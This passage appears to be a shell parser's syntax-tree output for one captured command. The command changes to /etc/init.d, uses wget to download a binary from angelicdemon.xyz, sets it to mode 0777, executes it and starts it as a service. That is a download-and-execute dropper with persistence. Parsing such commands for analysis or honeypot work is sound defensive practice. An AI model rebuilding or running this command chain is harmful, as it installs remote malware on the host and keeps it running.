  CommandNode(lineno=15, pos=(1975, 1989), parts=[
    WordNode(lineno=15, pos=(1975, 1977), word='cd'),
    WordNode(lineno=15, pos=(1978, 1989), word='/etc/init.d'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1989, 1990)),
  CommandNode(lineno=15, pos=(1991, 2031), parts=[
    WordNode(lineno=15, pos=(1991, 1995), word='wget'),
    WordNode(lineno=15, pos=(1996, 2031), word='http://angelicdemon.xyz/dakmassssss'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2031, 2032)),
  CommandNode(lineno=15, pos=(2033, 2055), parts=[
    WordNode(lineno=15, pos=(2033, 2038), word='chmod'),
    WordNode(lineno=15, pos=(2039, 2043), word='0777'),
    WordNode(lineno=15, pos=(2044, 2055), word='dakmassssss'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2055, 2056)),
  CommandNode(lineno=15, pos=(2057, 2070), parts=[
    WordNode(lineno=15, pos=(2057, 2070), word='./dakmassssss'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(2070, 2071)),
  CommandNode(lineno=15, pos=(2072, 2097), parts=[
    WordNode(lineno=15, pos=(2072, 2079), word='service'),
    WordNode(lineno=15, pos=(2080, 2091), word='dakmassssss'),
    WordNode(lineno=15, pos=(2092, 2097), word='start'),
  ]),
])
